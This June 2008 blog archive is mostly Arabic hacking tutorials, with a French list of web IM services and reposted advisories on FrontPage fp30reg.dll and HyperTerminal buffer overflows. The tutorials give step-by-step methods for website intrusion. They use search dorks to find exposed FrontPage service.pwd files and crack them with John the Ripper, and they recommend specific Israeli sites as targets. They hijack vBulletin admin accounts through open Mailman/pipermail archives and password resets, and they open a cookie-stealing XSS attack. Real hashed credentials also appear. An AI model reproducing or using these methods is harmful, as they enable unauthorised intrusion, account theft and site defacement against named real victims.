Archive for June, 2008

vos adresse web sur pc et gsm pour la messagerie instantané IM

bey mr electroman

Meebo & Meebo Rooms

Meebo est un service web based très populaire et depuis sa dernière version (Meebo Rooms) le succès va encore grandir. Totalement en ligne, offrant la fonction vidéos et beaucoup d’options. Le plus important est la robustesse du service qui ne connait pas vraiment de ralentissements.

http://www.meebo.com

Pibb

En comparaison avec la plupart des autres est une version light. Le service permet de créer des chatrooms, d’avoir une liste d’amis et de sauvegarder le contenu des discussions. Il a aussi la particularité d’être compatible avec OpenID.

http://pibb.com/

Tangler

Tangler est un forum en ligne actuellement en beta. L’originalité c’est qu’il permet des conversations en temps réel comparable aux services de chat en ligne. L’impression d’utiliser un forum peut permettre de conquérir un autre public. A noter qu’il propose des fonctions d’édition plus poussées que ses concurrents.

https://www.tangler.com/

Lingr

Nous ne savons pas quel avenir peut avoir ce service, mais il offre l’avantage de la simplicité. Il suffit de choisir un tag dans un nuage, d’entrer dans le chat et de commencer à discuter. Sachez néanmoins que la majorité des conversations sont en japonais.

http://www.lingr.com

Kool IM

koolim

Identique à Meebo, KooLIM aggrège les messageries en une seule page. Il est compatible avec AIM, MSN Messenger, Yahoo! Messenger, ICQ et Jabber.
Comme pour Meebo, il est possible d’ouvrir le chat dans un pop up et comme Meebo la pub a également fait son apparition.

http://www.koolim.com/

Campfire

Orienté vers les professionnels Campfire est un chat classique. Ses qualités reposent sur son intégration à Basecamp, l’archivages des conversations, la facilité d’échange de fichier et d’images.

http://campfirenow.com/

Yahoo! Messenger for the web

Yahoo a constasté le succès des chats en ligne, ils ont donc récemment rendu disponible la version web based de leur client IM. Il fonctionne sur tous les navigateurs, possède un historique complet et propose une longue liste d’émoticons.

http://webmessenger.yahoo.com/

MessengerFX

Comme Yahoo!, Windows Live Messenger dispose d’une version en ligne, celle ci n’est pas une version officielle et les auteurs ne sont pas affiliés à Microsoft. Rapide et efficace.

http://www10.messengerfx.com/

Iminent

On vous en a déja pas mal parlé, IMinent n’est pas vraiment un système de chat puisqu’il s’agit d’un module complémentaire à Windows live messenger et Yahoo!messenger. Il permet aux utilisateurs de s’envoyer en temps réels des Emovids, de courtes séquences vidéos représentant son état d’esprit.
Le service est sorti de beta privée il y a peu et est une initiative française.

http://www.iminent.com/

eBuddy

eBuddy permet d’utiliser AIM, Windows live messenger et Yahoo messenger via une interface en AJAX. Il ne supporte pas Jabber (gtalk) et est parfois lent.

http://www.ebuddy.com/

3bubbles

A la difference des autres services présentés ici (mis à part Meebo), 3bubbles se destine à être utiliser sur le blog via un widget. Ce n’est donc pas un vrai concurrent aux autres services.

http://www.3bubbles.com/

Tworl

Tword propose une manière vraiment originale d’aborder le chat et la messagerie instantanée, tandis que la signature de beaucoup de services correspond à quelque chose du style: “connectez vous à vos amis”, Tworl vous propose exactement l’inverse en vous mettant en contact aléatoirement avec une nouvelle liste d’utilisateurs. L’idée est plutôt sympa mais en aucun cas cela ne peut remplacer une vrai messagerie avec une “vrai” liste de contacts. L’usage est plutôt destiné au “fun”.

http://www.tworl.com/

Mabber

Mabber a l’avantage de fonctionner sur le web et aussi sur mobile. Il supporte AIM, ICQ, MSN, Yahoo Messenger et Gtalk. Une récente version propose le widget de chat que vous pourrez intégrer à votre blog. Vous pourrez également l’utiliser pour recevoir vos news en RSS (Mabber alert)

http://www.mabber.com/

Geesee

Geese est un concurrent direct de 3bubbles et Itzle: il n’offre pas d’espace de chat centralisé mais vous permet de créer un wigdet pour votre blog. L’outil fonctionne avec une multitude de plateforme comme Typepad, WordPress et même netvibes.

http://www.geesee.com/

Plugoo

Plugoo est un peu un mix de tout. Il fonctionne avec AIM, MSN, Yahoo, Gtal, ICQ et JAbber et vous permet également de créer un tchat pour les visisteurs de votre blog directement depuis n’importe quel client IM. Si vous voulez maintenir une discussion avec un visiteur de votre site/blog cet outil est vraiment plus intéressant qu’un simple chat box intégré qui indique toujours que vous êtes “offline”

http://www.plugoo.com

RadiusIM

Cette startup basé à Manhattan offre un service de IM qui combine un chat en ligne avec Google Maps, vous permettant ainsi de chatter avec des personnes de votre localité. vous pourrez agrégrer plusieurs pseudos IM de différentes plateformes. Les logins sont sauvegardés par Radius IM qui vous permet ainsi de ne pas avoir à retaper tous vos passwords/logins. (ils viennent de lever 500.000$ auprès de fonds d’investussement la semaine dernière)

http://www.radiusim.com

Itzle

Légèrement différent des autres services IM: Itzle vous permet de chater avec d’autres utilisateurs sur des pages webs par l’intermédiaire d’un avatar. pas de download nécessaire mais juste un “bookmarklet” sur lequel il faut cliquer pour faire apparaitre votre avatar. On trouve le service innovant mais on doute encore de son utilité.

http://www.itzle.com

Gabbly

Gabbly est un chat box en ajax pour blogs et sites web. Il vous permet d’avoir un chat sur votre propre domaine (avec une extension) en y incluant un iFrame.

http://www.gabbly.com

ZohoChat

Un des outils de la suite office Zoho, Zoho chats vous permet de chater avec d’autres utilisateurs sur votre site/blog. La fonction embed utilise un iFrame (qui ne marche donc pas sur toutes les plateformes/sites), il manque également la fonctionnalité d’aggrégation des différents pseudos des différents services de messagerie. Ceci étant dit c’est un moyen super sumple pour mettre en place un chat surtout si vous utilisez couramment la suite Zoho.

http://www.zohochat.com

ثغرة في نظام frontpage extension

mr electroman

COMMAND

FrontPage Server Extensions

SYSTEMS AFFECTED

FrontPage Server Extensions; IIS 4, 5

PROBLEM

There has been several issues with Front Page Server Extensions.

One of them was reported by Internet Security Systems Security

Alert. ISS X-Force is aware of a serious vulnerability that may

allow remote attackers to launch Denial of Service (DoS) attacks

against, or compromise Microsoft Internet Information Server

(IIS) installations. This vulnerability exists in the Visual

Studio Remote Application Deployment (RAD) component of FrontPage

Server Extensions.

Microsoft FrontPage is a Web site design and management

application. The FrontPage Server Extensions (FPSE) package is

included in IIS versions 4.0 and 5.0 to help integrate FrontPage

with IIS. IIS servers may be vulnerable if the Visual Studio RAD

component of FPSE is installed. This component allows Web site

designers who use Microsoft InterDev to actively register and

unregister COM components on the IIS server.

The Visual Studio RAD component includes a vulnerable Dynamic Link

Library (DLL), fp30reg.dll. This DLL does not properly parse long

arguments. Attackers may supply the DLL with an overly long

request and may be able to run arbitrary code or bring down the

server. Any commands executed on the server are executed under

the IUSR_machinename security context, and in certain

circumstances under the System context.

Following was by NSFOCUS Security Advisory SA2001-03. NSFOCUS

security team has found also a buffer overflow vulnerability in

Microsoft FrontPage 2000 Server Extension, which can be exploited

to execute arbitrary code by a remote attacker. Microsoft

FrontPage 2000 Server Extension has a Dynamic Link Library (.DLL)

File: “fp30reg.dll” that exists a buffer overflow vulnerability.

When fp30reg.dll receives a URL request that is longer than 258

bytes, a stack buffer overflow will occur. Exploiting this

vulnerability successfully, an attacker can remotely execute

arbitrary code on the server running MS FPSE 2000.

In case that fp30reg.dll receives an invalid parameter(method),

it will return an error message:

“The server is unable to perform the method [parameter provided by the user] at this time”

This error message will be saved in a fixed length stack buffer.

fp30reg.dll calls USER32.wsprintfA() to form return message.

Because there is no checkup for the length of data supplied by

the user, the destination buffer can be overwritten. An attacker

can rewrite some important memory address like exception structure

or saved EIP to change program flow.

Format string used by USER32.wsprintfA() is:

HTTP Error 501

NOT IMPLEMENTED

The server is unable to perform the method %s at this time.

It is also saved in stack and its address is at (target buffer

address + 256 bytes), so the format string will be rewritten when

the overflow occurs. The attacker should manage to finish

copying. If an attacker overwrite the buffer with random data,

IIS service will fail. In this case, IIS 5.0 can be automatically

self-restarted, but IIS 4.0 needs to be restarted manually.

Exploiting this vulnerability successfully, an attacker can obtain

the privilege of IWAM_machinename account in IIS 5.0 or Local

SYSTEM account in IIS 4.0 by default.

There is a copy of fp30reg.dll in another directory:

Program FilesCommon FilesMicrosoft SharedWeb Server Extensions bin

whose name is fp4areg.dll.

Exploiting some other vulnerabilities like unicode bug, an

attacker will be able to access this file.

Overflow won’t occur in case that the provided parameter has only

258 bytes:

$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e ‘print “A”x258’`

HTTP Error 501

NOT IMPLEMENTED

The server is unable to perform the method AAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAA at this time.

In case that it is longer than 258 bytes, an buffer overflow will

occur:

$ curl http://TARGET/_vti_bin/_vti_aut/fp30reg.dll?`perl -e ‘print “A”x259’`

ErrorThe remote procedure call

failed.

There is a proof of concept code for this issue:

http://www.nsfocus.com/proof/fpse2000ex.c

SOLUTION

ISS X-Force recommends that all Web site administrators review the

appropriate IIS Security Checklist from Microsoft, and verify

that their IIS Web servers have been configured securely. These

documents outline how to correctly configure an externally facing

IIS Web server. IIS servers that have been configured securely,

using the Checklists, are not vulnerable to many of the recent

and widely publicized remote IIS exploits.

The IIS Security Checklists are available here:

http://www.microsoft.com/technet/security/iischk.asp

http://www.microsoft.com/technet/security/iis5chk.asp

Patch for Microsoft Windows NT version 4.0:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038

For Microsoft Windows 2000 Professional, Server and Advanced

Server:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30727

For more information on this vulnerability, please refer to the

Microsoft Security Bulletin at:

http://www.microsoft.com/technet/security/bulletin/MS01-035.asp

Basically, installing MS01-035 causes the IIS MMC to close when

you click on the server extensions tab under Windows 2000

Advanced Server on SP2 (with all current hotfixes). Uninstalling

MS01-035 fixes the problem, but opens up the security hole. When

the new patch is available, MS will re-release their bulletin.

ثغرة Front Page

الكاتب : ^SpY^

الاختراق عن طريق ثغرة Front page

________________________________________

أولا :

…….قبل قرائتك للموضوع يجب أن يكون لديك فكرة ولو بسيطة عن :

1- Front page Server Extensions

2- ثغرات الفرونت بيدج و ليس كيفية استعمالها

3- الموضوع للمبتدئين فاذا لم تكن مبتدأ … فأنصحك بعدم تضييع وقتك معه

نخش في الموضوع:

طبعا ثغرات الفرونت بيدج تكون موجودة في الأنظمة التي يدعم سيرفراتها الFront page , وهذه الثغرات تمكن المخترق من الوصول لملف

الuser name و الpassword الخاص بالAdmin بتاع الموقع .

ولعلك تتسائل ما هذه الملفات ؟ … حسننا تكون الملفات على هذا النحو والتي تحتوي علىuser name و password الخاص بالAdmin :

Administrator.pwd

Author.pwd

Service.pwd وغالبا تكون الكلمة السرية في هذا المجلد , والذي هو متفرع من _Vti_pvt .

…..طبعا كلكم عارفين الحجات دي .. بس ممكن بعضكم ما قدرش يخترق بيها عشان مافهمش كويس من دروس غير …….المهم أنا هاشرحلكم درس عملي من A to Z للاختراق عن طريق الثغرة دي .

كنا قلنا ان الثغرة غالبا بتكون هنا http://www.site.com/_vti_pvt/_service.pwd , طب ممكن واحد يقول طب أنا جربت اكتب كدة مع مواقع كتيرة و بيطلعلي error أو Forbidien …..المهم ممكن الAdmin يكون عامل security شوية على الملف ده ….. طيب عشان تجرب وتنفذ هتتبع التالي:

ادخل على الموقع دة

http://www.altavista.com

وبعدين اكتب في الSearch الكلام دة Link:_Service.pwd أو اكتب Link:_vti_pvt/_service.pwd

المهم هيطلعلك نتايج بالهبل و معظمها تعاني من الثغرة دي , مثال http://www.soi-rp.com/_vti_pvt/ ادخل هنا , هيظهرلك صفحة وفيها الحجات دي :

Parent Directory

………. المهم خش على Service.pwd هتلاقي حاجة زي كدة : # -FrontPage- orechron:zjcZSlimQERyw

orechron ده الuser name

zjcZSlimQERyw ودي الpassword بس ماتجربهاش عشان دي مشفرة ….طيب عشان تفكها هتحتاج لjohn the ripper ممكن تحملها من هنا openwall.com المهم لما تحمل الأداة هتلاقي مجلدين run و doc والمهم هوه run بالنسبة لطيرقة العمل هاتكون كالتالي …. هاتلاقي ملف عندك في الجهاز اسمو command موجود في System32 انسخه وضعه في المجلد run …. وبعدين تحطorechron:zjcZSlimQERyw في ملف txt وليكن باسم password …..طيب افتح command واكتب الامرده <john -i:all password.txt

وبعد مايخلص البرنامج هتلاقي الpassword الحقيقية هنا john.pot

كدة خلاص … وصلنا للختام وهوه انك تصمم صفحة بالفرونت بيدج وتكتب فيها Hacked by ^SpY^

وتعمل pubish web هايطلب username و password هاتكتبهم و….. و مبروك عليك الاختراق .

و عموما أنصحكم بالبحث هنا عشان دي مواقع يهوديه تبحث بطريقة الSpiders يعني Random Hacking :

achla.co.il

maven.co.il

iguide.co.il

____________________________

طرق معرفة واختراق المواقع التي تدعم FrontPage

كثر منا يعلم ان هذه الثغرة خاصة بنظام// NT – Unix

1-وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟

بعدة طرق ولن أذكر إلا الأسهل:

– بالذهاب إلى موقع netcraft

http://www.netcraft.com/

وكتابة اسم الموقع وبعد البحث سوف يظهر

mod_frontpage/x

x=(رقم الإصدار الخاص بالفرونت بيج)

– عن طريق إضافة جملة

vti_inf.html_/

بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/

نضيف الجملة ليصبح بهذه الطريقة

http://www.almodammer.com/_vti_inf.html

وبعدها اضغط Enter

وراح يطلعلك في أول الصفحة هذه الكلمة

Frontpage Configuration Information

أي قد تم تثبيت مجلدات وبرامج الفرونت بيج

– وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا

بإضافة

vti_cnf_/

بعد عنوان الموقع كهذا المثال:

http://www.almodammer.com/_vti_cnf

واضغط زر الفأرة الأيمن واختار

source المصدر

وابحث عن

vti_generator:Programe

حيث

Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به

————————————————–

2-ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟

بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك

يعني وعلى سبيل المثال

http://www.almodammer.com/

يدعم fontpage طيب نذهب إلى ملف vti_pvt_

كذا يعني

http://www.almodammer.com/_vti_pvt

وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:

=============

Adminstrator.pwd

Adminstrators.pwd

Service.pwd

Users.pwd

User.pwd

Author.pwd

=============

ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود

username : passwd

اسم المستخدم والباسوورد

يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password

وهذا مضمون الملف

operator:hi9LHn9wAMuKM

حيث اسم المستخدم : operator

الباسوورد المشفرة هي:hi9LHn9wAMuKM

ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره

وهذا يتم ببرامج كثير

=(Crack Jack)=

=(John The Ripper)=

راح نستخدم الأفضل والأكثر تداولا وهو

John The Ripper

لتحميل البرنامج من هذا الموقع::

http://www.openwall.com/john

كيف تفك التشفير بهذا البرنامج

أول شي تروح تنقل البرنامج إلى مجلد

:c

بعدين تفتح مجلد RUN

وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها

إذهب إلى

ابدأ start

تشغيل run

اكتب الأمر

command

اضغط على Enter وبعدها راح يفتح

إطار الـDoS

اذهب إلى مجلد RUN

وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر

..cd

حتى توصل

<:c

بعدين اكتب

cd john

اضغط على Enter

وراح يظهر لك بهذا الشكل

<c:john

واكتب

cd RUN

وبتدخل المجلد ليصبح بهذه الطريقة

<c:/john/RUN

ألحين نكتب أوامر برنامج John The Ripper

وهي

====

john -i:all passd.txt

————————–

يبحث لك عن جميع الأنواع والاحتمالات

====

john -i:Alpha passwd.txt

———————————-

يبحث عن الأحرف الصغيرة

====

john -i: Digits passwd.txt

———————————-

يبحث عن الأرقام

====

john -i:single passwd.txt

———————————

أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم

——————————————————————————–

وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى

john.pot

الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها

——————————————————————————–

إنت ألحين مستريح عندك username والـpassword

وش بقالك ؟!!

يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/

frontpage

بعدين

file وتذهب إلى

open web وتضيف

الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك

من FTP

وعليك ببرامج الـFTP المنتشرة

كالـws-ftp

والـpro ftp

والمزيد …

ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك

======================================

وألحين أكيد تبون تجربون على موقع أقولكم روحوا google

http://www.google.com/

واكتبوا في إطار البحث

vti_pvt_/

وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة

وعندك محرك بحث

http://www.altavista.com/

تكتب في محرك البحث

link:service.pwd

أو..

link:adminstrators

وغيرها من الملفات الاحتمال وجود password فيها

DETECTER VOTRE ADRESSE IP

bey mr electroman
ouvrer bloc note puis copier coller ce code la et enregister en format .html exepmle index.htm

معلومات عامة عن Msn Proxy Server

ثغرة في Hyper Terminal في نظم Msn

Electroman please your attention

COMMAND

HyperTerminal

SYSTEMS AFFECTED

Win2000 (all versions), Me, 98 and 98SE

PROBLEM

The USSR Team has found a buffer overflow in the HyperTerminal
telnet client, which is in the code that processes the Telnet
URL’s, that can enable an attacker to execute arbitrary code on
another user’s system. If a user opens an mail containing HTML
and also contains a malformed Telnet URL a buffer overrun will
enable the creator of the mail to cause arbitrary code to be
runned on the user’s system.

Example:

telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/

The other resides in a section of the code that processes session
files – files that enable HyperTerminal users to specify session
parameters such as the connection method and the destination
host. If a user opened a session file that contained a particular
type of malformed information, it would trigger the buffer
overrun.

SOLUTION

Microsoft has re-released original bulletin in May 2001 to inform
customers of the availability of an updated set of patches to
address both the original and a second vulnerability identified
in HyperTerminal. Information about the second issue is discussed
in the PROBLEM section above.

A patch is available to fix this vulnerability. Please read the
Security Bulletin:

http://www.microsoft.com/technet/security/bulletin/ms00-079.asp

for information on obtaining this patch.

ثغره تخترق نصف المواقع ونصف منتديات النت

وانا ابريء ذمتي بما يحصل بالمواقع العربيه
وعندي خبر إنا في ناس راح تخترق المواقع العربيه بس اقولهم هالكلمتين
خلونا على وعدنا!!!!!! وخلونا من الواعدين بأختراق اليهود والامريكان والغرب وليس العرب …أرجوا عدم استخدام هذه الثغرة فيما حرمه الله وأنا أبرئ ذمتي من كل استخدام محرم اللهم بلغت اللهم اشهد !!

أخواني الأعزاء وضعت هذه الثغرة من أجلكم فلا تخيبوا ظني وتخترقوا مواقع عربيه
ونكون سبب في ذلك

على العموم اذا حدث اختراق منتديات اومواقع عربيه

فمنتدى العاصفه ليس مسؤول عما يحدث ‍‌‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍

ــــــــــــــــــــــــــــــــــــــــــــــــــ

الثغره اللي تؤدي الى إختراق الموقع كامل وسرقة الفيزا كارد وسرقة الدومين كامل ………هيه بالأصل pipermail

وهيه عباره عن كشف رسائل الخاصه للدومين اي لصاحب الموقع

اولا هيه بسيطه بس اتبع الطرق الاتيه

كيف نقدر نوصل لرسائل الدومين والرسائل الموجودين.. اي المواقع المستاضافين في السيرفر

اتبع الاتي
انا موعلى جهازي ولا كان شرحت بالصور
لاكن خيرها بغيرها
نفترض الموقع هذا ( تجربه للتطبيق )

http://www.sccoutdoors.com/

نكتب بجنب الموقع
/mailman/admin
يعني بالشكل هذا
http://www.sccoutdoors.com/mailman/admin

راح تلاقي ايميلات المواقع

..بس هذا اخترقته مره وحده وانحاش من المواقع المستضيفه
يفكر ان الاختراق منهم
فعشان كذا ماراح تلقى ايميلات المواقع ولاحتى ايميله
المهم
راح تلقى كلام ….وبين السطور هتلقى الجمله هذي ( اظغط عليه)
at the mailing list overview page

هتلاقي نفسك بالصفحه هذي
http://www.sccoutdoors.com/mailman/listinfo

برضو هيطلعلك كلام وهتقول ياليل ماطولك
الله!!!! طيب ايش اللي استفدنا ماستفدنا شي

لحضه وين رايح ؟
طيب اكتب اسم الموقع بدون www
يعني بالشكل هذا
http://sccoutdoors.com/mailman/admin
تمام
هتلقى كلام في اسفل الصفحه
List Description
Sccoutdoors no description available

طيب اظغط على كلمة Sccoutdoors

هتلقى نفسك بالصفحه هذي

http://sccoutdoors.com/mailman/admi…sccoutdoors.com

راح يطلب اليوزر والباسوور
Sccoutdoors Administrator Authentication

List Administrator Password
دام موقع الامريكي طلب منا ماندخل الا والباسوورد معانا…..
راح ندخل عليه بدون باسوورد

في اسفل الصفحه مكتوب
هذا للأفاده
المهم
Sccoutdoors list run by sccoutdoors at sccoutdoors.com
Sccoutdoors administrative interface (requires authorization)
Overview of all sccoutdoors.com mailing lists

اها اضغط على كلمة Sccoutdoors
وهوه مختصر هذرتي بس اهم شي لازم اتعرف الكلام اللي مذكور ولا ماراح توصل
اللي تبي

المهم هتلقى في هذي الصفحه
http://sccoutdoors.com/mailman/list…sccoutdoors.com

هتلقى تحت مكتوب To see the collection of prior postings to the list, visit the
وبجنبه مكتوب Sccoutdoors Archives
اظغط على Sccoutdoors Archives وهو ارشيف ايميل الضحيه كامل

To post a message to all the list members, send email to Sccoutdoors@sccoutdoors.com.

هتلاقي نفسك في ايميل صاحب الموقع !!!!!!!!!!!!

http://sccoutdoors.com/pipermail/sc…sccoutdoors.com

You can get more information about this list or you can download the full raw archive ( 242 KB ).

Archive View by: Downloadable version
September 2003: [ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip’d Text 525 bytes ]
August 2003: [ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip’d Text 17 KB ]

ترجمة معانيه
يمكن أن تحضر معلومات عن أكثر هذه القائمة أو يمكن أن تحمّل الأرشيف الكامل

طبع download the full raw archive هو قرائت الايميل كامل من المتصفح
اي الاكسبلور
وتقدر تحمل بجهازك

September 2003 التاريخ اللي وصل في رساله للأيميل سبتمبر 2003

المهم تبي تقرا الرسايل على رواقه ..تضغط على Thread

وتشوف عناوين وتصفحهم هتلاقي رسائل من الشركه اللي هوه مشتري منه الدومين
ويوزرات وباسووردات ftp والمنتدى والخ …واذا مش موجود اوماسحهم

تقدر تطلبه من الشركه المستضافه على ايميله وهتجيك بنفس الوقت

وهتلاقي فيزا كارد والخ……

@اختراق المنتديات @

بأختصاااااااار

طبعا هذا اذا المنتدى موجود ويوزر والباسوورد ماهو موجود ايش تسوي

طبق الكلام اللي شفته فوق

الخطوه الاولى: اذهب الى المنتدى
واظغط على نسيت كلمة المروور

بعدين يقولك

نموذج إستعادة كلمة السر
في حال وأن نسيت كلمة السر الخاصة بك ، بإمكانك إستعادتها من خلال هذا النموذج ، فقط كل الذي تقوم به هو كتابة عنوان البريد الإلكتروني الخاص بك وسوف تصلك كلمة السر من خلاله .
عنوان البريد الإلكتروني

الموقع لنفترض http://sccoutdoors.com/
اكتب ايميله sccoutdoors@sccoutdoorscom

بعدين بيقولك تم ارسال البيانات الخاصه على هذا الايمل

الخطوه الثانيه

اذهب الى ايميله مباشر
http://sccoutdoors.com/pipermail/sc…sccoutdoors.com
باختصار طبعا
وتضغط September 2003 /
اي هذي الصفحه
http://sccoutdoors.com/pipermail/sc…2003-September
واعطي الصفحه(((ريفريش))

لين تلاقي لون الصفحه تغير….. صار بالون الجديد الازق

هوه بكون اخر رساله تحت…. تضغط علي الرساله
مكتوب
[Vb] بيانات تسجيلك لدى منتديات (ـــــــــــــ)

اظغط عليه هتلاقي الرساله

مكتوب فيها:

لقد قمت بطلب تغيير كلمة المرور في منتديات (ــــــــــــ) اذا لم تكن فقدتها فتجاهل هذه الرساله فان مفعوله سوف ينتهي خلال 24 ساعه

لتغيير كلمة المرور الخاصة بك الرجاء زيارة الصفحة التالية :
http://www.om/vb/member.php?a=pwd&u

=1&i=97058200

عد زيارتك للصفحه المذكوره اعلاه سوف يتم تغيير كلمة المرور وارسالها لك عبر البريد .

اسم عضويتك هو :stuntman

لتعديل ملفك الشخصي يرجى زيارة هذه الصفحة :
http://wwwm/vb/member.php?action=editprofile

ــــــــــــــــــــــــــــــــــــــــــــــــــ

الخطوه الرابعه :

اظغط على هذي الجمله

لتغيير كلمة المرور الخاصة بك الرجاء زيارة الصفحة التالية :
http://www.om/vb/member.php?a=pwd&u=1&i=97058200

بعدين هيقولك تم ارسال كلمة الرور على الايميل ‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍!!!!!!!!!!

الخطوه الخامسه
نفس الطريقه اللي فوق
اذهب الى ايميله مباشر تا
واعطي الصفحه(((ريفريش))

لين تلاقي لون الصفحه تغير صار بالون الجديد الازق

هوه بكون اخر رساله تحت الرساله
مكتوب

[Vb] بيانات تسجيلك لدى منتديات (ـــــــــــــ)
[Vb] كلمة المرور الجديدة في منتديات (ــــــــــــ)

ادخل واخذ كلمة المروور

واذهب
الى http://www.xxxxxxxxxx.com/vb/admin

هذا يوم اني اقول كل واحد يوجد لديه موقع يضع على admin حمايه بالباسوورد

بس كنك يابوز زيد ماغزيت
لووول

الخطوه
وعلى فكره اللي عنده موقع ويبي يعرف ايميلات المستضافين
يكتب الموقع حقه بالشكل هذا
ايميل المستضاف/www.xxxxxxxxx.com/pipermail/
او بالطبع معروف
بأن صاحب ايميله يكون على اسم الموقع
اولا اذهب الى WWW.GOOGLE.COM

ولاتبحث على الثغره …لاابحث على جميع المواقع !!
يعني ابحث على حرف a بس وجرب فيهم
هتقولي ابحث على منتدى اصدار 20 اصدار 60 لا ابحث على جميع المواقع

منقول
ملاحظه: ستواجه منتديات عربيه هكر وغير هكر ومنتديات اسلاميه ومعروفه ( لا تنسى بانك تحذرهم )

اي سؤوال عن الثغره انا حاضر

الحمايه منها:
هوه عدم انشاء برنامج بريد المراسله او البريد الموقع في موقعك ….

طريقة اختراق المنتديات

طريقة اختراق المنتديات

الكاتب : لا اعرف عنه اى شئ

اختراق المنتديات بس بمنتديات vb

. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

أو العنوان التفصيلي التالي :
http://URL/memberlist.php

URL = العنوان المستضيف للمنتدى

مثل = – .com

4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

http://URL/member.php?soitgoe68e45u…info&userid=266

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

http://URL/member.php?soitgoe68e45u…etinfo&userid=1

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

http://URL/member.php?action=login&…VALI…39;&#8217;).’

العنوان هذا ستقوم بتغيير الكلمات التالية

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .

8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

بالطيع ستظهر لك الصفحة التعيسة التي تقول :

you typed in the wrong password

9. بكل بساطة أضغط على

نسيت كلمة السر
forgot password

والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

اختراق منتديات الـــ vBulletin

بسم الله الرحمن الرحيم

يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A – Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
” أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد “
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه …

———
مقدمة :
———

الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة لسيت للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .

———-
الثغرة :
———

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

